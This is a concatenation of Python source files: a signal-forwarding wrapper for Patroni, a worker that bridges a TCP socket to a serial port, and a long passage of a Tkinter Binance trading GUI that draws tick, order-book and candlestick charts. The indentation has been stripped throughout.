signal.signal(signal.SIGUSR1, passtochild)
signal.signal(signal.SIGUSR2, passtochild)
signal.signal(signal.SIGINT, passtochild)
signal.signal(signal.SIGABRT, passtochild)
signal.signal(signal.SIGTERM, passtochild)
import multiprocessing
patroni = multiprocessing.Process(target=patroni_main)
patroni.start()
pid = patroni.pid
patroni.join()
|
process_worker.py
|
# coding=utf-8
import multiprocessing
import serial
import socket
import os
import fuckargs
# Serial port communication
# The loop rate is dictated by the hardware serial port's communication rate
def get_serial_info( input_str ):
os.system( "echo %d >>pid_repo" % os.getpid() ) # store the pid
while True:
if input_str.value.find("$_$") > -1:
print len( input_str.value )
input_json_list, input_str.value = input_str.value[:-3].split("$_$"), ""
for input_json in input_json_list:
print input_json
ser.write( input_json )
# socket server
def socket_server( input_str ):
os.system( "echo %d >>pid_repo" % os.getpid() ) # store the pid
host = fuckargs.get( "host" ) # Symbolic name meaning all available interfaces
port = int( fuckargs.get("port") ) # Arbitrary non-privileged port
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) # create a TCP socket for network communication
s.bind( (host, port) ) # bind the socket to the host IP and port
s.listen( 5 ) # start listening for TCP connections
input_str.value = ""
while True:
conn, addr = s.accept() # accept a TCP connection; returns a new socket and the client address
# print 'Connected by', addr # log the client's IP address
try:
while True:
data=conn.recv(1024) # read up to 1024 bytes of received data
# if the payload is non-empty (longer than a trivial frame)
if len(data) > 11:
# block and wait until the shared buffer has room; a stop-gap approach for now
while 1:
will_input_str = input_str.value + data + "$_$"
if len( will_input_str ) < 40000: break
input_str.value = will_input_str
conn.sendall( "done" ) ### by convention, send a placeholder "pseudo-acknowledgement" for now
except:
conn.close() # close the connection
# Main process
ser = serial.Serial( fuckargs.get("usb"), int( fuckargs.get("bits") ) )
string_dict = multiprocessing.Array( "c", "fuck"*10000 ) # reserve a 40000-character shared string buffer
os.system( "echo %d >>pid_repo" % os.getpid() ) # store the pid
p_serial = multiprocessing.Process( target=get_serial_info, args=(string_dict,) )
p_socket = multiprocessing.Process( target=socket_server, args=(string_dict,) )
p_serial.start()
p_socket.start()
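# A minimal, hypothetical model of the "$_$" framing the two processes use
# to hand records through the shared buffer (illustrative only, not part of
# the worker):
def _demo_delimiter_framing():
    buf = "msg1$_$msg2$_$"  # what socket_server accumulates
    records, buf = buf[:-3].split("$_$"), ""  # what get_serial_info does
    return records  # -> ["msg1", "msg2"]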
|
iTrader.py
|
from tkinter import *
from tkinter import Menu
from tkinter import ttk
from tkinter.ttk import Combobox
from tkinter import messagebox
import tkinter.font as font
from binance_api import Binance
import threading
import time
import datetime
import os
import os.path
#__Main global variables
ep = False # Exit program flag (ExitProgram)
#__Pressed-button states (Start/Stop) - daemon process variables
PS1 = False #Timer button_1 state (Start/Stop) true/false
PS_BU = False #Timer button_2 state (Start/Stop) true/false
PS_AB = False #Timer button_AB state (Start/Stop) true/false
PS_OT = False #Timer button_OrdTmr state (Start/Stop) true/false
Ord_Zm = False #Whether to display the Zoom of orders - button_Ord state (Zoom/Norm) true/false
#__Timer run status - daemon process variables
should_run_T = False #Timer TICK start true/false
should_run_C = False #Timer CANDLES start true/false
should_run_S = False #Timer CANDLES SUMM start true/false
should_run_BU = False #Timer BTC/USDT watch start true/false
should_run_AB = False #Timer Account Balances watch start true/false
should_run_OT = False #Timer Order Timer start true/false
should_run_OZ = False #Timer Order Zoom start true/false
#__Variables to terminate the program - are all timers stopped
TE_Tck = True
TE_Cnd = True
TE_CndSm = True
TE_BU = True
TE_AB = True
TE_Zm = True
TE_OrdTmr = True
#__API Keys from Binance
API_KEY_s = ''
API_SECRET_s = ''
bot = Binance(API_KEY='', API_SECRET='')
isAcc = False
sys_msg = ''
yI=0
y0I_TP=0
yM=0
Lo=0
TT0=0
#__Pair parameters for graphs
GS='CANDLE 5m'
grSmb = 'BNBUSDT' #symbol
Lo=0 #last order number
grSt = 16 #price step
grZm = 500 #Zoom parameter
grOW = 1000 #Parameter for the width of the order candle
prSt = 0.1 #Price step
grH = 1 #Chart height
grW = 1 #Chart width
grMd = 0.5 #Half the height of the graph
NwOrSw=False
#__Market Parameters
MS = 'SPOT' #FUTURES or SPOT
MPS = 'USDT'
#__Individual parameters of the pair
Lvrg = 1
Lvrg_Tmp = 1
MrgT='NONE'
MrgT_Tmp='NONE'
Isl = True
orLSS=1
#__Position parameters (futures)
PEP = 0
PSP = 0
PPP = 0
PPP_Tmp = 0
PSP_Tmp = 0
PosSide='LONG'
#Order parameters
yI0Zm = 0 #Current price for OrderZoom
#______________Timer for building a Tick chart
class Timer_Tick:
def __init__(self):
global yI
global Lo
global TE_Tck
while True:
if PS1 == True:
sys_msg = ' The tick chart ' + grSmb + ' is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_Tck = True
break
if should_run_T:
for i in range(400):
if not should_run_T:
sys_msg = ' The tick chart ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_T:
if i==0:
sys_msg = ' The tick chart ' + grSmb + ' is running.'
app.Sys_Msg(text1=sys_msg)
TE_Tck = False
if i > 0:
time.sleep(0.01)
#Link to view in the browser: https://api.binance.com/api/v1/depth?symbol=ETHBTC
#limit - number of returned records from 5 to 1000 (100 by default).
#Acceptable values: 5, 10, 20, 50, 100, 500, 1000.
#You can also specify 0, but it can return a large number of data.
#The weight depends on the limit parameter. With a limit from 5 to 100, the weight will be equal to 1.
#For the 500 value, the weight will be 5. For the value 1000, the weight will be 10.
#print (grSmb)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=50)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=50)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#print('trades', bot.trades(symbol='BNBUSDT', limit=1))
#If one bought and the other sold, is it "buy" or "sell"?
#In the Binance trade history, trades with isBuyerMaker == false are shown in green,
#and those with isBuyerMaker == true in magenta.
#sss41 = "BNBUSDT - trades"
if MS=='SPOT':
myTup12 =('trades', bot.trades(symbol=grSmb, limit=20)) #Tupl
myDicGr1 = myTup12[1][19] #dict
elif MS=='FUTURES':
myTup12 = ('FutTrades', bot.futuresTrades(symbol=grSmb, limit=20)) #tupl
myDicGr1 = myTup12[1][19] #dict
#print(myTup12[1][0])
#print(myTup12[1][19])
if i==0:
yI0=float(myDicGr1['price'])
yI=100
app.graph_1.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
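# grSt: canvas pixels per price tick - grZm pixels are mapped onto 1% of the
# reference price yI0, measured in prSt-sized price steps.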
TT0 = time.mktime(time.localtime())*1000
#print (TT0)
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(500,grMd)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,grMd + grSt/2,text="%.2f" % (yI0))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,grMd + grSt/2,text="%.2f" % (yI0))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.3f" % (yI0))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.4f" % (yI0))
elif prSt < 0.0001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.8f" % (yI0))
yp=-60
ypi=-4
while yp < 1500:
points=[]
yp = 0 + ypi*60
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
tm=TT0/1000+ypi*15
tm1 = datetime.datetime.fromtimestamp(tm)
tmm=tm1.strftime("%M:%S")
app.graph_Tb.create_text(0 + ypi*60,10,text=tmm)
app.graph_Td.create_text(0 + ypi*60,10,text=tmm)
ypi += 1
yp=grMd
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/400)/prSt)*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(500,yp)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0-ypi*(yI0/400)))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0-ypi*(yI0/400)))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,yp + grSt/2,text="%.3f" % (yI0-ypi*(yI0/400)))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.4f" % (yI0-ypi*(yI0/400)))
elif prSt < 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.8f" % (yI0-ypi*(yI0/400)))
ypi += 1
yp=grMd
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/400)/prSt)*grSt
pp=(-500,yp)
points.append(pp)
pp=(500,yp)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0+ypi*(yI0/400)))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0+ypi*(yI0/400)))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,yp + grSt/2,text="%.3f" % (yI0+ypi*(yI0/400)))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.4f" % (yI0+ypi*(yI0/400)))
elif prSt < 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.8f" % (yI0+ypi*(yI0/400)))
ypi += 1
for mm in range(len(myTup12[1])):
myDicGr1TT = myTup12[1][mm]
if int(myDicGr1TT['id']) > Lo:
xx=myDicGr1TT['time']
xxp = 20 + ((xx - TT0)/1000)*4
yyp = grMd - ((float(myDicGr1TT['price'])-yI0)/prSt)* grSt
if xxp > 1000:
app.graph_1.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT['quoteQty']) < 100:
x1, y1 = (xxp - 1), (yyp - 1)
x2, y2 = (xxp + 1), (yyp + 1)
elif 100 <= float(myDicGr1TT['quoteQty']) <= 1000:
x1, y1 = (xxp - 2 - 3*(float(myDicGr1TT['quoteQty'])/1000)), (yyp -2 - 3*(float(myDicGr1TT['quoteQty'])/1000))
x2, y2 = (xxp + 2 + 3*(float(myDicGr1TT['quoteQty'])/1000)), (yyp + 2 + 3*(float(myDicGr1TT['quoteQty'])/1000))
elif 1000 < float(myDicGr1TT['quoteQty']) <= 10000:
x1, y1 = (xxp - 5 - 3*(float(myDicGr1TT['quoteQty'])/10000)), (yyp - 5 - 3*(float(myDicGr1TT['quoteQty'])/10000))
x2, y2 = (xxp + 5 + 3*(float(myDicGr1TT['quoteQty'])/10000)), (yyp + 5 + 3*(float(myDicGr1TT['quoteQty'])/10000))
elif 10000 < float(myDicGr1TT['quoteQty']) <= 50000:
x1, y1 = (xxp - 8), (yyp - 8)
x2, y2 = (xxp + 8), (yyp + 8)
elif float(myDicGr1TT['quoteQty']) > 50000:
x1, y1 = (xxp - 10), (yyp - 10)
x2, y2 = (xxp + 10), (yyp + 10)
if myDicGr1TT['isBuyerMaker'] == True:
flc = "magenta"
if float(myDicGr1TT['quoteQty']) > 50000:
flc = "black"
else:
flc="green"
if float(myDicGr1TT['quoteQty']) > 50000:
flc = "gold"
app.graph_1.create_oval(x1, y1, x2, y2, fill=flc)
#print(x1,x2,y1,y2)
Lo=int(myDicGr1TT['id'])
#__Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0)/prSt)* grSt
#print('-', yI0, ' - ', float(mylist5[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-yI0)/prSt)* grSt
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=grSt)
if float(mylist4[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-yI0)/prSt)* grSt
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0)/prSt)* grSt
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=grSt)
#______________Timer for building a Candle chart
class Timer_Candle:
def __init__(self):
global TE_Cnd
global yI
global Lo
global PEP
global PPA
global PSP
global PPP
global y0I_TP
global GPPP_Tmp
global GPSP_Tmp
global GPPP_Tmp_txt
global GPSP_Tmp_txt
global grMd
global grSt
global grFt
global GOS_TP
global GOS_SL
grFt_12 = font.Font(size=12)
grFt_10 = font.Font(size=10)
while True:
if PS1 == True:
sys_msg = ' The candlestick chart ' + grSmb + ' is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_Cnd = True
break
if should_run_C:
for i in range(400):
if not should_run_C:
sys_msg = ' The candlestick chart ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_C:
if i==0:
sys_msg = ' The candlestick chart ' + grSmb + ' is running.'
app.Sys_Msg(text1=sys_msg)
TE_Cnd = False
if i > 0:
time.sleep(0.5)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=10)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=10)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
if i==0:
app.Scale_TP.set(0)
app.Scale_SL.set(0)
#print(myTup11[1])
if MS=='SPOT' and i==0:
if GS=='CANDLE 5m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='5m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='5m', limit=288))
elif GS=='CANDLE 1m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1m', limit=288))
elif GS=='CANDLE 15m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='15m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='15m', limit=288))
elif GS=='CANDLE 30m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='30m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='30m', limit=288))
elif GS=='CANDLE 1h':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1h', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1h', limit=288))
elif GS=='CANDLE 4h':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='4h', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='4h', limit=288))
elif GS=='CANDLE 1d':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1d', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1d', limit=288))
myDicGr1 = myTupSpK[1] #dict
myDicBTCD = myTupBTCD[1]
#print(myDicGr1)
yI0=float(myDicGr1[287][1])
y0I_TP = yI0
#print (myDicGr1[1][1])
elif MS=='FUTURES' and i==0:
if GS=='CANDLE 5m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='5m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='5m', limit=288)) #tupl
elif GS=='CANDLE 1m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1m', limit=288)) #tupl
elif GS=='CANDLE 15m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='15m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='15m', limit=288)) #tupl
elif GS=='CANDLE 30m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='30m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='30m', limit=288)) #tupl
elif GS=='CANDLE 1h':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1h', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1h', limit=288)) #tupl
elif GS=='CANDLE 4h':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='4h', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='4h', limit=288)) #tupl
elif GS=='CANDLE 1d':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1d', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1d', limit=288)) #tupl
my_file_Kl = open(grSmb + "_KL.txt", "w")
my_file_Kl.write(str(myTupFtK))
my_file_Kl.close()
#print(myTup12)
myDicGr1 = myTupFtK[1]
myDicBTCD = myTupBTCD[1]
#print(myDicGr1)
yI0=float(myDicGr1[287][1])
y0I_TP = yI0
if i==0:
PnL_Pos_L = ''
PnL_Pos_S = ''
BnMt = bot.futuresOrders(limit=1)
#print (BnMt)
Lo = int(BnMt[0]['orderId'])
#print (Lo)
yI=100
PnL_Pos = 0
app.graph_Cn.delete("all")
app.graph_VV.delete("all")
app.graph_BTCD.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
#print(grZm)
#print (grMd)
TT0 = time.mktime(time.localtime())*1000
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(900,grMd)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
GAP = app.graph_Cn.create_line(points,fill="blue",width=1,dash=(4,2))
if MS == 'FUTURES':
GPEP_L = app.graph_Cn.create_line((0,0,0,0),fill="#336633",width=1,dash=(20,10))
GPEP_S = app.graph_Cn.create_line((0,0,0,0),fill="black",width=1,dash=(20,10))
GPLP = app.graph_Cn.create_line((0,0,0,0),fill="orange",width=3,dash=(20,10))
GPSP = app.graph_Cn.create_line((0,0,0,0),fill="red",width=3,dash=(20,10))
GPSP_txt = app.graph_Cn.create_text((0,0),text='',fill="red",font=grFt_12)
GPPP = app.graph_Cn.create_line((0,0,0,0),fill="green",width=3,dash=(20,10))
GPPP_txt = app.graph_Cn.create_text((0,0),text='',fill="green",font=grFt_12)
GPPP_Tmp = app.graph_Cn.create_line((0,0,0,0),fill="#66CDAA",width=1,dash=(50,50))
GPPP_Tmp_txt = app.graph_Cn.create_text((0,0),fill="#36a355",text='')
GPSP_Tmp = app.graph_Cn.create_line((0,0,0,0),fill="#DC143C",width=1,dash=(50,50))
GPSP_Tmp_txt = app.graph_Cn.create_text((0,0),fill="#DC143C",text='')
GEPt = app.graph_Cn.create_text(0,0,text='',fill="black",font=grFt_12)
GLO_L = []
GLO_L_txt = []
GLO_S = []
GLO_S_txt = []
for j in range (100):
GLO_L_L = app.graph_Cn.create_line((0,0,0,0),fill="#336633",width=1)
GLO_L.append(GLO_L_L)
GLO_L_L_txt = app.graph_Cn.create_text((0,0),fill="#336633",text='')
GLO_L_txt.append(GLO_L_L_txt)
GLO_S_S = app.graph_Cn.create_line((0,0,0,0),fill="#DC143C",width=1)
GLO_S.append(GLO_S_S)
GLO_S_S_txt = app.graph_Cn.create_text((0,0),fill="#DC143C",text='')
GLO_S_txt.append(GLO_S_S_txt)
GOS_TP = app.graph_Cn.create_rectangle((0,0,0,0),fill="#66CDAA")
GOS_SL = app.graph_Cn.create_rectangle((0,0,0,0),fill="pink")
#print(yI0,grMd,prSt)
if prSt >= 0.1:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue",font=grFt_10)
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue",font=grFt_10)
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.3f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.3f" % (yI0),fill="blue",font=grFt_10)
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.4f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.4f" % (yI0),fill="blue",font=grFt_10)
elif prSt < 0.0001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.8f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.8f" % (yI0),fill="blue",font=grFt_10)
yp=1180
ypi=0
while yp > -500:
points=[]
if GS=='CANDLE 5m':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1m':
yp_s = 10*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 15m':
yp_s = 8*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 30m':
yp_s = 8*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1h':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 4h':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1d':
yp_s = 14*4
yp = 1180 - ypi*yp_s
#print(yp)
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1,dash=(4,2))
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
if GS=='CANDLE 5m':
tm=TT0/1000+36000-ypi*3600
elif GS=='CANDLE 1m':
tm=TT0/1000+7200-ypi*600
elif GS=='CANDLE 15m':
tm=TT0/1000+108000-ypi*7200
elif GS=='CANDLE 30m':
tm=TT0/1000+216000-ypi*14400
elif GS=='CANDLE 1h':
tm=TT0/1000+432000-ypi*43200
elif GS=='CANDLE 4h':
tm=TT0/1000+1728000-ypi*172800
elif GS=='CANDLE 1d':
tm=TT0/1000+10368000-ypi*1209600
tm1 = datetime.datetime.fromtimestamp(tm)
if GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h':
tmm=tm1.strftime("%H:%M")
elif GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
tmm=tm1.strftime("%d.%m")
app.graph_Tb.create_text(1180 - ypi*yp_s,10,text=tmm)
app.graph_Td.create_text(1180 - ypi*yp_s,10,text=tmm)
ypi += 1
yp=grMd
if grZm <= 100:
ypi = 10
else:
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0-ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0-ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0-ypi*(yI0/100)))
if grZm <= 100:
ypi += 10
else:
ypi += 1
yp=grMd
if grZm <= 100:
ypi = 10
else:
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp)
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0+ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0+ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0+ypi*(yI0/100)))
if grZm <= 100:
ypi += 10
else:
ypi += 1
#print (len(myDicGr1))
for mm in range(len(myDicGr1)):
myDicGr1TT = myDicGr1[mm]
myDicGr1BTCD = myDicBTCD[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
if GS=='CANDLE 5m':
xxp = 700 + ((((xx - TT0)/1000)+150)/300)*4
elif GS=='CANDLE 1m':
xxp = 700 + ((((xx - TT0)/1000)+30)/60)*4
elif GS=='CANDLE 15m':
xxp = 700 + ((((xx - TT0)/1000)+450)/900)*4
elif GS=='CANDLE 30m':
xxp = 700 + ((((xx - TT0)/1000)+900)/1800)*4
elif GS=='CANDLE 1h':
xxp = 700 + ((((xx - TT0)/1000)+1800)/3600)*4
elif GS=='CANDLE 4h':
xxp = 700 + ((((xx - TT0)/1000)+7200)/14400)*4
elif GS=='CANDLE 1d':
xxp = 700 + ((((xx - TT0)/1000)+43200)/86400)*4
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
if mm == 0:
yypVMax = 0
yypTMax = 0
for nm in range(len(myDicGr1)):
if float(myDicGr1[nm][5])>yypVMax:
#print(myDicGr1[nm][5])
yypVMax = float(myDicGr1[nm][5])
if float(myDicGr1[nm][8])>yypTMax:
#print(myDicGr1[nm][5])
yypTMax = float(myDicGr1[nm][8])
yyp5 = 100-((float(myDicGr1TT[5])/yypVMax))*100
yyp6 = ((float(myDicGr1TT[8])/yypTMax))*100
app.graph_BTCD.create_line(-100,50,1000,50,fill='black',dash=(1,1))
else:
yyp5 = 100-((float(myDicGr1TT[5])/yypVMax))*100
yyp6 = ((float(myDicGr1TT[8])/yypTMax))*100
if float(myDicGr1BTCD[1]) < float(myDicGr1BTCD[4]):
app.graph_BTCD.create_line(xxp,50,xxp,50-((float(myDicGr1BTCD[2])-float(myDicGr1BTCD[3]))/(float(myDicGr1BTCD[3])/100))*20,fill='green')
else:
app.graph_BTCD.create_line(xxp,50,xxp,50+((float(myDicGr1BTCD[2])-float(myDicGr1BTCD[3]))/(float(myDicGr1BTCD[3])/100))*20,fill='red')
if xxp > 1000:
app.graph_Cn.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "green"
else:
flc="red"
app.graph_Cn.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Cn.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Cn.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
app.graph_VV.create_line(xxp,100,xxp,yyp5,fill=flc)
app.graph_VV.create_line(xxp+1,0,xxp+1,yyp6,fill='black')
if MS == 'FUTURES':
BnFAcc=bot.userPositionInfo()
if len(BnFAcc)>0:
sTmp=''
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
#print(BnFAcc1)
if str(BnFAcc1['symbol'])==grSmb and float(BnFAcc1['positionAmt']) != 0:
y_liq = float(BnFAcc1['liquidationPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
app.graph_Cn.coords(GPLP, -500,y_liq,800,y_liq)
y_liq = float(BnFAcc1['entryPrice'])
PEP=float(BnFAcc1['entryPrice'])
PPA = float(BnFAcc1['positionAmt'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
#print (BnFAcc1['positionSide'])
if str(BnFAcc1['positionSide'])=='LONG':
app.graph_Cn.coords(GPEP_L, -500,y_liq,800,y_liq)
